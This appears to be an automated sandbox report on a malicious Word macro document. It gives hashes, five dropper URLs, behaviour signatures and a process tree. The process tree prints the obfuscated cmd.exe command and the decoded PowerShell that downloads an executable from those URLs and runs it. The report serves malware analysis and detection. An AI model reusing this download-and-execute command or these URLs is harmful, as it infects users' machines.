Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    02-06-2024 07:37

General

  • Target

    8d53569ccbbc71c205c317c61843c045_JaffaCakes118.doc

  • Size

    137KB

  • MD5

    8d53569ccbbc71c205c317c61843c045

  • SHA1

    4a93a2bd46c95aa231f9207f7cf1a29028da68d8

  • SHA256

    f763d74e2db1ee98b4265c698c0c821c147bc9ab583b361338482e62ce291dd7

  • SHA512

    3f5b32ffce094a1d57f7a2c313d2177c1dcd743fc82cc2881b900e83444594a68541c237d46596bee3a2ad93eb0a2232ba02fbd0e1f70aee9cd705c5d5c5f99a

  • SSDEEP

    3072:A8GhDS0o9zTGOZD6EbzCd3WiWCAWcWvfxa:eoUOZDlbe3WiWCAWcWvfxa

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://levifca.com/y0tYhnWQ

exe.dropper

http://mfpvision.com/yAkPNiSmm6

exe.dropper

http://haganelectronics.rubickdesigns.com/C96xSAAy2q

exe.dropper

http://catairdrones.com/sMQ0n8nNun

exe.dropper

http://radio312.com/mp0NHN4cHX

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8d53569ccbbc71c205c317c61843c045_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1740
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1676
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V:O/C"set lj=;'afd'=dww$}}{hctac}};kaerb;'boU'=OFK$;vWd$ metI-ekovnI{ )00008 eg- htgnel.)vWd$ metI-teG(( fI;'fBW'=fSP$;)vWd$ ,abU$(eliFdaolnwoD.dam${yrt{)tdB$ ni abU$(hcaerof;'exe.'+Ihv$+'\'+pmet:vne$=vWd$;'BLv'=zqo$;'391' = Ihv$;'UDL'=DqS$;)'@'(tilpS.'XHc4NHN0pm/moc.213oidar//:ptth@nuNn8n0QMs/moc.senordriatac//:ptth@q2yAASx69C/moc.sngisedkcibur.scinortcelenagah//:ptth@6mmSiNPkAy/moc.noisivpfm//:ptth@QWnhYt0y/moc.acfivel//:ptth'=tdB$;tneilCbeW.teN tcejbo-wen=dam$;'kaF'=zYv$ llehsrewop&&for /L %9 in (475;-1;0)do set Yfw=!Yfw!!lj:~%9,1!&&if %9==0 powershell "!Yfw:*Yfw!=!" "
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "powershell $vYz='Fak';$mad=new-object Net.WebClient;$Bdt='http://levifca.com/y0tYhnWQ@http://mfpvision.com/yAkPNiSmm6@http://haganelectronics.rubickdesigns.com/C96xSAAy2q@http://catairdrones.com/sMQ0n8nNun@http://radio312.com/mp0NHN4cHX'.Split('@');$SqD='LDU';$vhI = '193';$oqz='vLB';$dWv=$env:temp+'\'+$vhI+'.exe';foreach($Uba in $Bdt){try{$mad.DownloadFile($Uba, $dWv);$PSf='WBf';If ((Get-Item $dWv).length -ge 80000) {Invoke-Item $dWv;$KFO='Uob';break;}}catch{}}$wwd='dfa';"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2980
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =Fak
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1636

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      bad331cc21d89a3e7131a976d38a9d25

      SHA1

      574c8282746e797d1ba56fa9b27008798a6938e3

      SHA256

      de6dc38c36b60ea1fe4e4346408dd5e7983fe0645299a2538cad9c85ce15c5e8

      SHA512

      04af711037ae4f62f88e64f13dbe506e70f2da3336effebe4a117ef6d44dbbd28b329118cbf8a8e0feb0b78cfc7c8ac722512f52b3bde05c31bc199b40f64432

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      6ba52c4c2c7d2f0ee54592326d73c0da

      SHA1

      0ed7d8e80f69fc6575786dc65ef484e6ea5a764e

      SHA256

      81288a8f174970286e81e0e1dc36cb2514ee4c3ebb2478e70c30cb3dfc64db1e

      SHA512

      bed83933cbdf8f559f39546afac6063dbf423293270153cd7a48e774396420ea723803e49aad4874cc508c1b926ec5ffa23c8fdc4503f075e4256b48a98d8f4b

    • memory/1740-6-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/1740-0-0x000000002F411000-0x000000002F412000-memory.dmp

      Filesize

      4KB

    • memory/1740-8-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/1740-7-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/1740-2-0x0000000071A1D000-0x0000000071A28000-memory.dmp

      Filesize

      44KB

    • memory/1740-23-0x0000000071A1D000-0x0000000071A28000-memory.dmp

      Filesize

      44KB

    • memory/1740-24-0x0000000000500000-0x0000000000600000-memory.dmp

      Filesize

      1024KB

    • memory/1740-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1740-39-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1740-40-0x0000000071A1D000-0x0000000071A28000-memory.dmp

      Filesize

      44KB

    • memory/2980-21-0x00000000054D0000-0x0000000005528000-memory.dmp

      Filesize

      352KB

    • memory/2980-22-0x00000000055A0000-0x00000000055EF000-memory.dmp

      Filesize

      316KB